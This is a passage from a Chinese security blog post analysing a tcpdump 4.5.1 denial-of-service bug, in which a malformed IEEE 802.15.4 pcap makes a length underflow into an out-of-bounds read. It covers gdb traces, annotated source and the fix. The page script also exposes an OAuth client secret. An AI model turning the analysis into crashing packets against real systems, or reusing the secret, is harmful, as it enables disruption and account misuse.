+<p>从崩溃信息来看，出错位置为s2 = <em>cp++;崩溃原因为SIGSEGV，即进程执行了一段无效的内存引用或发生段错误。可以看到，问题出现在./print-ascii.c:91，而且此时指针读取[ebx+ebp</em>2+0x1]的内容，可能是越界读取造成的崩溃。<br>再结合源码信息可知，指针cp在自加的过程中访问到了一个没有权限访问的地址，因为这是写在一个while循环里，也就是是说nshorts的值偏大，再看nshorts怎么来的，由此nshorts = length / sizeof(u_short);可知，可能是函数传入的参数length没有控制大小导致，因此目标就是追踪length是如何传入的。<br>我们通过bt回溯一下调用情况。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">1.	gdb-peda$ bt</span><br><span class="line">2.	#0  hex_and_ascii_print_with_offset (ident=0x80c04af &quot;\n\t&quot;, cp=0x8204000 &lt;error: Cannot access memory at address 0x8204000&gt;,</span><br><span class="line">3.	    length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:91</span><br><span class="line">4.	#1  0x08053e26 in hex_and_ascii_print (ident=0x80c04af &quot;\n\t&quot;, cp=0x81e33bd &quot;&quot;, length=0xfffffff3) at ./print-ascii.c:127</span><br><span class="line">5.	#2  0x08051e7d in ieee802_15_4_if_print (ndo=0x81e1320 &lt;Gndo&gt;, h=0xbfffe40c, p=&lt;optimized out&gt;) at ./print-802_15_4.c:180</span><br><span class="line">6.	#3  0x080a0aea in print_packet (user=0xbfffe4dc &quot; \023\036\b\300\034\005\b\001&quot;, h=0xbfffe40c, sp=0x81e33a8 &quot;@\377&quot;)</span><br><span class="line">7.	    at ./tcpdump.c:1950</span><br><span class="line">8.	#4  0xb7fa3468 in ?? () from /usr/lib/i386-linux-gnu/libpcap.so.0.8</span><br><span class="line">9.	#5  0xb7f940e3 in pcap_loop () from /usr/lib/i386-linux-gnu/libpcap.so.0.8</span><br><span class="line">10.	#6  0x0804b3dd in main (argc=0x3, argv=0xbffff6c4) at ./tcpdump.c:1569</span><br><span class="line">11.	#7  0xb7de9637 in __libc_start_main (main=0x804a4c0 &lt;main&gt;, argc=0x3, argv=0xbffff6c4, init=0x80b1230 &lt;__libc_csu_init&gt;,</span><br><span class="line">12.	    fini=0x80b1290 &lt;__libc_csu_fini&gt;, rtld_fini=0xb7fea880 &lt;_dl_fini&gt;, stack_end=0xbffff6bc) at ../csu/libc-start.c:291</span><br><span class="line">13.	#8  0x0804c245 in _start ()</span><br></pre></td></tr></table></figure></p>
+<p>函数调用流程<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">pcap_loop</span><br><span class="line">  |----print_packet</span><br><span class="line">                 |-----hex_and_ascii_print</span><br><span class="line">                                |--------  hex_and_ascii_print_with_offset</span><br></pre></td></tr></table></figure></p>
+<p>由此可见，从main函数开始了一连串函数调用，git源码下来看看。<br>tcpdump.c找到pcap_loop调用<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">1.	    do &#123;</span><br><span class="line">2.	        status = pcap_loop(pd, cnt, callback, pcap_userdata);</span><br><span class="line">3.	        if (WFileName == NULL) &#123;</span><br><span class="line">4.	            /*</span><br><span class="line">5.	             * We&apos;re printing packets.  Flush the printed output,</span><br><span class="line">6.	             * so it doesn&apos;t get intermingled with error output.</span><br><span class="line">7.	             */</span><br><span class="line">8.	            if (status == -2) &#123;</span><br><span class="line">9.	                /*</span><br><span class="line">10.	                 * We got interrupted, so perhaps we didn&apos;t</span><br><span class="line">11.	                 * manage to finish a line we were printing.</span><br><span class="line">12.	                 * Print an extra newline, just in case.</span><br><span class="line">13.	                 */</span><br><span class="line">14.	                putchar(&apos;n&apos;);</span><br><span class="line">15.	            &#125;</span><br><span class="line">16.	            (void)fflush(stdout);</span><br><span class="line">17.	        &#125;</span><br></pre></td></tr></table></figure></p>
+<p>设置断点之后查看一下该函数的执行结果</p>
+<p>pcap_loop通过callback指向print_packet,来看一下它的源码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">1.	static void</span><br><span class="line">2.	print_packet(u_char *user, const struct pcap_pkthdr *h, const u_char *sp)</span><br><span class="line">3.	&#123;</span><br><span class="line">4.	    struct print_info *print_info;</span><br><span class="line">5.	    u_int hdrlen;</span><br><span class="line">6.	    ++packets_captured;</span><br><span class="line">7.	    ++infodelay;</span><br><span class="line">8.	    ts_print(&amp;h-&gt;ts);</span><br><span class="line">9.	    print_info = (struct print_info *)user;</span><br><span class="line">10.	    /*</span><br><span class="line">11.	     * Some printers want to check that they&apos;re not walking off the</span><br><span class="line">12.	     * end of the packet.</span><br><span class="line">13.	     * Rather than pass it all the way down, we set this global.</span><br><span class="line">14.	     */</span><br><span class="line">15.	    snapend = sp + h-&gt;caplen;</span><br><span class="line">16.	        if(print_info-&gt;ndo_type) &#123;</span><br><span class="line">17.	                hdrlen = (*print_info-&gt;p.ndo_printer)(print_info-&gt;ndo, h, sp);&lt;====</span><br><span class="line">18.	        &#125; else &#123;</span><br><span class="line">19.	                hdrlen = (*print_info-&gt;p.printer)(h, sp);</span><br><span class="line">20.	        &#125;</span><br><span class="line">21.	    putchar(&apos;n&apos;);</span><br><span class="line">22.	    --infodelay;</span><br><span class="line">23.	    if (infoprint)</span><br><span class="line">24.	        info(0);&#125;</span><br></pre></td></tr></table></figure></p>
+<p>同样设置断点看该函数是如何调用执行的</p>
+<p>这是我们可以根据call的信息，计算出调用的函数名</p>
+<p>其中(*print_info-&gt;p.ndo_printer)(print_info-&gt;ndo,h,sp)指向ieee802_15_4_if_print</p>
+<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line">25.	u_int</span><br><span class="line">26.	ieee802_15_4_if_print(struct netdissect_options *ndo,</span><br><span class="line">27.	const struct pcap_pkthdr *h, const u_char *p)</span><br><span class="line">28.	&#123;</span><br><span class="line">29.	printf(&quot;address : %x\n&quot;,p);</span><br><span class="line">30.	u_int caplen = h-&gt;caplen; //传入的caplen，赋值给无符号整形变量caplen,且该值为8</span><br><span class="line">31.	int hdrlen;</span><br><span class="line">32.	u_int16_t fc;</span><br><span class="line">33.	u_int8_t seq;</span><br><span class="line">34.	if (caplen &lt; 3) &#123; //不满足</span><br><span class="line">35.	ND_PRINT((ndo, &quot;[|802.15.4] %x&quot;, caplen));</span><br><span class="line">36.	return caplen;</span><br><span class="line">37.	&#125;</span><br><span class="line">38.	fc = EXTRACT_LE_16BITS(p);</span><br><span class="line">39.	hdrlen = extract_header_length(fc);</span><br><span class="line">40.	seq = EXTRACT_LE_8BITS(p + 2);</span><br><span class="line">41.	p += 3;</span><br><span class="line">42.	caplen -= 3;//此时caplen = 5</span><br><span class="line">43.	ND_PRINT((ndo,&quot;IEEE 802.15.4 %s packet &quot;, ftypes[fc &amp; 0x7]));</span><br><span class="line">44.	if (vflag)</span><br><span class="line">45.	ND_PRINT((ndo,&quot;seq %02x &quot;, seq));</span><br><span class="line">46.	if (hdrlen == -1) &#123;</span><br><span class="line">47.	ND_PRINT((ndo,&quot;malformed! &quot;));</span><br><span class="line">48.	return caplen;</span><br><span class="line">49.	&#125;</span><br><span class="line">50.	if (!vflag) &#123;</span><br><span class="line">51.	p+= hdrlen;</span><br><span class="line">52.	caplen -= hdrlen;</span><br><span class="line">53.	&#125; else &#123;</span><br><span class="line">54.	u_int16_t panid = 0;</span><br><span class="line">55.	switch ((fc &gt;&gt; 10) &amp; 0x3) &#123;</span><br><span class="line">56.	case 0x00:</span><br><span class="line">57.	ND_PRINT((ndo,&quot;none &quot;));</span><br><span class="line">58.	break;</span><br><span class="line">59.	case 0x01:</span><br><span class="line">60.	ND_PRINT((ndo,&quot;reserved destination addressing mode&quot;));</span><br><span class="line">61.	return 0;</span><br><span class="line">62.	case 0x02:</span><br><span class="line">63.	panid = EXTRACT_LE_16BITS(p);</span><br><span class="line">64.	p += 2;</span><br><span class="line">65.	ND_PRINT((ndo,&quot;%04x:%04x &quot;, panid, EXTRACT_LE_16BITS(p)));</span><br><span class="line">66.	p += 2;</span><br><span class="line">67.	break;</span><br><span class="line">68.	case 0x03:</span><br><span class="line">69.	panid = EXTRACT_LE_16BITS(p);</span><br><span class="line">70.	p += 2;</span><br><span class="line">71.	ND_PRINT((ndo,&quot;%04x:%s &quot;, panid, le64addr_string(p)));</span><br><span class="line">72.	p += 8;</span><br><span class="line">73.	break;</span><br><span class="line">74.	&#125;</span><br><span class="line">75.	ND_PRINT((ndo,&quot;&lt; &quot;);</span><br><span class="line">76.	switch ((fc &gt;&gt; 14) &amp; 0x3) &#123;</span><br><span class="line">77.	case 0x00:</span><br><span class="line">78.	ND_PRINT((ndo,&quot;none &quot;));</span><br><span class="line">79.	break;</span><br><span class="line">80.	case 0x01:</span><br><span class="line">81.	ND_PRINT((ndo,&quot;reserved source addressing mode&quot;));</span><br><span class="line">82.	return 0;</span><br><span class="line">83.	case 0x02:</span><br><span class="line">84.	if (!(fc &amp; (1 &lt;&lt; 6))) &#123;</span><br><span class="line">85.	panid = EXTRACT_LE_16BITS(p);</span><br><span class="line">86.	p += 2;</span><br><span class="line">87.	&#125;</span><br><span class="line">88.	ND_PRINT((ndo,&quot;%04x:%04x &quot;, panid, EXTRACT_LE_16BITS(p)));</span><br><span class="line">89.	p += 2;</span><br><span class="line">90.	break;</span><br><span class="line">91.	case 0x03:</span><br><span class="line">92.	if (!(fc &amp; (1 &lt;&lt; 6))) &#123;</span><br><span class="line">93.	panid = EXTRACT_LE_16BITS(p);</span><br><span class="line">94.	p += 2;</span><br><span class="line">95.	&#125;</span><br><span class="line">96.	ND_PRINT((ndo,&quot;%04x:%s &quot;, panid, le64addr_string(p))));</span><br><span class="line">97.	p += 8;</span><br><span class="line">98.	break;</span><br><span class="line">99.	&#125;</span><br><span class="line">100.	caplen -= hdrlen;</span><br><span class="line">101.	&#125;</span><br></pre></td></tr></table></figure>
+<p>传入的第二个值是struct pcap_pkthdr *h结构体，函数使用的参数caplen就是结构体中的caplen，不难看出，caplen进行一些加减操作后，没有判断正负，直接丢给了下一个函数使用。<br>直接跟进函数，看看最后赋值情况</p>
+<p>从源码和调试信息可以看到libpcap在处理不正常包时不严谨，导致包的头长度hdrlen竟然大于捕获包长度caplen，并且在处理时又没有相关的判断。hdrlen和caplen都是非负整数，导致caplen==0xfffffff3过长。<br>继续跟进hex_and_asciii_print(ndo_default_print)</p>
+<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">1.	void</span><br><span class="line">2.	hex_and_ascii_print(register const char *ident, register const u_char *cp,</span><br><span class="line">3.	    register u_int length)</span><br><span class="line">4.	&#123;</span><br><span class="line">5.	    hex_and_ascii_print_with_offset(ident, cp, length, 0);</span><br><span class="line">6.	&#125;</span><br><span class="line"></span><br><span class="line">其中length==0xfffffff3，继续执行</span><br><span class="line">1.	void</span><br><span class="line">2.	hex_print_with_offset(register const char *ident, register const u_char *cp, register u_int length,</span><br><span class="line">3.	              register u_int oset)</span><br><span class="line">4.	&#123;</span><br><span class="line">5.	    register u_int i, s;</span><br><span class="line">6.	    register int nshorts;</span><br><span class="line">7.</span><br><span class="line">8.	    nshorts = (u_int) length / sizeof(u_short);</span><br><span class="line">9.	    i = 0;</span><br><span class="line">10.	    while (--nshorts &gt;= 0) &#123;</span><br><span class="line">11.	        if ((i++ % 8) == 0) &#123;</span><br><span class="line">12.	            (void)printf(&quot;%s0x%04x: &quot;, ident, oset);</span><br><span class="line">13.	            oset += HEXDUMP_BYTES_PER_LINE;</span><br><span class="line">14.	        &#125;</span><br><span class="line">15.	        s = *cp++;   &lt;======= 抛出错误位置</span><br><span class="line">16.	        (void)printf(&quot; %02x%02x&quot;, s, *cp++);</span><br><span class="line">17.	    &#125;</span><br><span class="line">18.	    if (length &amp; 1) &#123;</span><br><span class="line">19.	        if ((i % 8) == 0)</span><br><span class="line">20.	            (void)printf(&quot;%s0x%04x: &quot;, ident, oset);</span><br><span class="line">21.	        (void)printf(&quot; %02x&quot;, *cp);</span><br><span class="line">22.	    &#125;</span><br><span class="line">nshorts=(u_int) length / sizeof(u_short) =&gt; nshorts=0xfffffff3/2=‭7FFFFFF9‬‬‬‬</span><br></pre></td></tr></table></figure>
+<p>但数据包数据没有这么长，导致了crash。</p>
+<h3 id="内存分析"><a href="#内存分析" class="headerlink" title="内存分析"></a>内存分析</h3><p>仔细分析之后发现，通过len判断的这个长度并没有进行控制，如果是自己构造的一个超长len的数据包，则会连续读取到不可估计的值。<br>通过查看epx的值来看一下这个内存到底开辟到什么位置<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1.	gdb-peda$ x/10000000x 0x81e33bd</span><br><span class="line">2.	0x8203fdd:      0x00000000      0x00000000      0x00000000      0x00000000</span><br><span class="line">3.	0x8203fed:      0x00000000      0x00000000      0x00000000      0x00000000</span><br><span class="line">4.	0x8203ffd:      Cannot access memory at address 0x8204000</span><br></pre></td></tr></table></figure></p>
+<p>可以看到，到达0x 8204000附近的时候，就是无法读取的无效地址了，那么初始值为0x 81e33bd，用两个值相减。0x 8204000-0x 81e33bd = 0x 20c40，因为ebx+ebp*2+0x1一次读取两个字节，那么循环计数器就要除以2，最后结果为0x 10620。<br>来看一下到达拒绝服务位置读取的长度：EBX: 0x81e33bd –&gt; 0x0；EBP: 0x10621；<br>EBP刚好为10621。正是不可读取内存空间的地址，因此造成拒绝服务。</p>
+<h3 id="漏洞总结"><a href="#漏洞总结" class="headerlink" title="漏洞总结"></a>漏洞总结</h3><p>总结一下整个漏洞触发过程，首先tcpdump会读取恶意构造的pcap包，在构造pcap包的时候，设置一个超长的数据包长度，tcpdump会根据len的长度去读取保存在内存空间数据包的内容，当引用到不可读取内存位置时，会由于引用不可读指针，造成拒绝服务漏洞。</p>
+<h2 id="漏洞修补"><a href="#漏洞修补" class="headerlink" title="漏洞修补"></a>漏洞修补</h2><p>Libpcap依然是apt安装的默认版本，tcpdump使用4.7 .0-bp版本<br>在hex_and_ascii_print_with_offset中增加对caplength的判断<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">1.	caplength = (ndo-&gt;ndo_snapend &gt;= cp) ? ndo-&gt;ndo_snapend - cp : 0;</span><br><span class="line">2.	if (length &gt; caplength)</span><br><span class="line">3.	    length = caplength;</span><br><span class="line">4.	nshorts = length / sizeof(u_short);</span><br><span class="line">5.	i = 0;</span><br><span class="line">6.	hsp = hexstuff; asp = asciistuff;</span><br><span class="line">7.	while (--nshorts &gt;= 0) &#123;</span><br><span class="line">8.	    ...</span><br><span class="line">9.	&#125;</span><br></pre></td></tr></table></figure></p>
+<p>可以看到执行完caplength = (ndo-&gt;ndo_snapend &gt;= cp) ? ndo-&gt;ndo_snapend - cp : 0;，caplength为0，继续执行，可以推出length同样为0，到这里已经不会发生错误了。</p>
+<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a href="https://www.exploit-db.com/exploits/39875/" target="_blank" rel="noopener">exploit-db payload</a><br><a href="https://whereisk0shl.top/post/2016-10-23-1" target="_blank" rel="noopener">WHEREISK0SHL分析博客</a><br><a href="https://github.com/the-tcpdump-group" target="_blank" rel="noopener">libpcap/tcpdump源码</a></p>
+
+      
+    </div>
+    
+    
+    
+
+    
+
+    
+      <div>
+        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
+  <div>您的支持将鼓励我继续创作！</div>
+  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
+    <span>打赏</span>
+  </button>
+  <div id="QR" style="display: none;">
+
+    
+      <div id="wechat" style="display: inline-block">
+        <img id="wechat_qr" src="/images/Wechatpay.png" alt="Cool-Y 微信支付">
+        <p>微信支付</p>
+      </div>
+    
+
+    
+      <div id="alipay" style="display: inline-block">
+        <img id="alipay_qr" src="/images/Alipay.png" alt="Cool-Y 支付宝">
+        <p>支付宝</p>
+      </div>
+    
+
+    
+
+  </div>
+</div>
+
+      </div>
+    
+
+    
+
+    <footer class="post-footer">
+      
+        <div class="post-tags">
+          
+            <a href="/tags/TCPDUMP/" rel="tag"># TCPDUMP</a>
+          
+            <a href="/tags/拒绝服务攻击/" rel="tag"># 拒绝服务攻击</a>
+          
+        </div>
+      
+
+      
+      
+      
+
+      
+        <div class="post-nav">
+          <div class="post-nav-next post-nav-item">
+            
+              <a href="/2018/12/23/基于规则引擎发现IOT设备/" rel="next" title="基于采集规则引擎的物联网设备发现方法">
+                <i class="fa fa-chevron-left"></i> 基于采集规则引擎的物联网设备发现方法
+              </a>
+            
+          </div>
+
+          <span class="post-nav-divider"></span>
+
+          <div class="post-nav-prev post-nav-item">
+            
+              <a href="/2019/01/16/wifi半双工侧信道攻击学习笔记/" rel="prev" title="wifi半双工侧信道攻击学习笔记">
+                wifi半双工侧信道攻击学习笔记 <i class="fa fa-chevron-right"></i>
+              </a>
+            
+          </div>
+        </div>
+      
+
+      
+      
+    </footer>
+  </div>
+  
+  
+  
+  </article>
+
+
+
+    <div class="post-spread">
+      
+    </div>
+  </div>
+
+
+          </div>
+          
+
+
+          
+
+  
+    <div class="comments" id="comments">
+      
+        <div id="gitment-container"></div>
+      
+    </div>
+
+  
+
+
+
+        </div>
+        
+          
+  
+  <div class="sidebar-toggle">
+    <div class="sidebar-toggle-line-wrap">
+      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
+      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
+      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
+    </div>
+  </div>
+
+  <aside id="sidebar" class="sidebar">
+    
+    <div class="sidebar-inner">
+
+      
+
+      
+        <ul class="sidebar-nav motion-element">
+          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
+            文章目录
+          </li>
+          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
+            站点概览
+          </li>
+        </ul>
+      
+
+      <section class="site-overview-wrap sidebar-panel">
+        <div class="site-overview">
+          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
+            
+              <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Cool-Y">
+            
+              <p class="site-author-name" itemprop="name">Cool-Y</p>
+              <p class="site-description motion-element" itemprop="description"></p>
+          </div>
+
+          <nav class="site-state motion-element">
+
+            
+              <div class="site-state-item site-state-posts">
+              
+                <a href="/archives/">
+              
+                  <span class="site-state-item-count">16</span>
+                  <span class="site-state-item-name">日志</span>
+                </a>
+              </div>
+            
+
+            
+              
+              
+              <div class="site-state-item site-state-categories">
+                <a href="/categories/index.html">
+                  <span class="site-state-item-count">6</span>
+                  <span class="site-state-item-name">分类</span>
+                </a>
+              </div>
+            
+
+            
+              
+              
+              <div class="site-state-item site-state-tags">
+                <a href="/tags/index.html">
+                  <span class="site-state-item-count">31</span>
+                  <span class="site-state-item-name">标签</span>
+                </a>
+              </div>
+            
+
+          </nav>
+
+          
+
+          
+            <div class="links-of-author motion-element">
+                
+                  <span class="links-of-author-item">
+                    <a href="https://github.com/Cool-Y" target="_blank" title="GitHub">
+                      
+                        <i class="fa fa-fw fa-github"></i>GitHub</a>
+                  </span>
+                
+                  <span class="links-of-author-item">
+                    <a href="mailto:cool.yim@whu.edu.cn" target="_blank" title="E-Mail">
+                      
+                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
+                  </span>
+                
+                  <span class="links-of-author-item">
+                    <a href="https://www.instagram.com/yan__han/" target="_blank" title="Instagram">
+                      
+                        <i class="fa fa-fw fa-instagram"></i>Instagram</a>
+                  </span>
+                
+            </div>
+          
+
+          
+          
+
+          
+          
+
+          
+
+        </div>
+      </section>
+
+      
+      <!--noindex-->
+        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
+          <div class="post-toc">
+
+            
+              
+            
+
+            
+              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#TCPDUMP-4-5-1-拒绝服务攻击漏洞分析"><span class="nav-number">1.</span> <span class="nav-text">TCPDUMP 4.5.1 拒绝服务攻击漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Tcpdump介绍"><span class="nav-number">1.1.</span> <span class="nav-text">Tcpdump介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#分析环境"><span class="nav-number">1.2.</span> <span class="nav-text">分析环境</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞复现"><span class="nav-number">1.3.</span> <span class="nav-text">漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#编译安装tcpdump"><span class="nav-number">1.3.1.</span> <span class="nav-text">编译安装tcpdump</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#生成payload（来自exploit-db-payload）"><span class="nav-number">1.3.2.</span> <span class="nav-text">生成payload（来自exploit-db payload）</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#崩溃分析"><span class="nav-number">1.4.</span> <span class="nav-text">崩溃分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#pcap包格式"><span class="nav-number">1.4.1.</span> <span class="nav-text">pcap包格式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#gdb调试"><span class="nav-number">1.4.2.</span> <span class="nav-text">gdb调试</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#内存分析"><span class="nav-number">1.4.3.</span> <span class="nav-text">内存分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞总结"><span class="nav-number">1.4.4.</span> <span class="nav-text">漏洞总结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞修补"><span class="nav-number">1.5.</span> <span class="nav-text">漏洞修补</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考"><span class="nav-number">1.6.</span> <span class="nav-text">参考</span></a></li></ol></li></ol></div>
+            
+
+          </div>
+        </section>
+      <!--/noindex-->
+      
+
+      
+
+    </div>
+  </aside>
+
+
+        
+      </div>
+    </main>
+
+    <footer id="footer" class="footer">
+      <div class="footer-inner">
+        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
+  <span class="with-love">
+    <i class="fa fa-user"></i>
+  </span>
+  <span class="author" itemprop="copyrightHolder">Cool-Y</span>
+
+  
+    <span class="post-meta-divider">|</span>
+    <span class="post-meta-item-icon">
+      <i class="fa fa-area-chart"></i>
+    </span>
+    
+    <span title="Site words total count">44.8k</span>
+  
+</div>
+
+
+  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>
+
+
+
+
+
+
+
+
+        
+<div class="busuanzi-count">
+    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
+
+  
+    <span class="site-uv">
+      <i class="fa fa-user"></i>
+      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
+      
+    </span>
+  
+
+  
+    <span class="site-pv">
+      <i class="fa fa-eye"></i>
+      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
+      
+    </span>
+  
+</div>
+
+
+
+
+
+
+
+
+        
+      </div>
+    </footer>
+
+    
+      <div class="back-to-top">
+        <i class="fa fa-arrow-up"></i>
+        
+      </div>
+    
+
+    
+
+  </div>
+
+  
+
+<script type="text/javascript">
+  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
+    window.Promise = null;
+  }
+</script>
+
+
+
+
+
+
+
+
+
+  
+
+
+
+
+
+
+
+
+
+
+
+
+  
+  
+    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
+  
+
+
+  
+
+
+  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>
+
+  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>
+
+
+
+  
+  
+
+
+  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>
+
+  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>
+
+
+
+  
+  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
+<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>
+
+
+
+  
+
+
+  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>
+
+
+
+  
+
+
+  
+
+
+
+
+	
+
+
+
+
+
+  
+
+
+
+
+
+  
+
+
+
+
+
+
+
+<!-- LOCAL: You can save these files to your site and update links -->
+    
+        
+        <link rel="stylesheet" href="https://aimingoo.github.io/gitmint/style/default.css">
+        <script src="https://aimingoo.github.io/gitmint/dist/gitmint.browser.js"></script>
+    
+<!-- END LOCAL -->
+
+    
+
+    
+      <script type="text/javascript">
+      function renderGitment(){
+        var gitment = new Gitmint({
+            id: window.location.pathname, 
+            owner: 'Cool-Y',
+            repo: 'gitment-comments',
+            
+            lang: "" || navigator.language || navigator.systemLanguage || navigator.userLanguage,
+            
+            oauth: {
+            
+            
+                client_secret: '1c5db4da72df5e6fc318d12afe5f4406f7c54343',
+            
+                client_id: '180955a2c3ae3d966d9a'
+            }});
+        gitment.render('gitment-container');
+      }
+
+      
+      renderGitment();
+      
+      </script>
+    
+
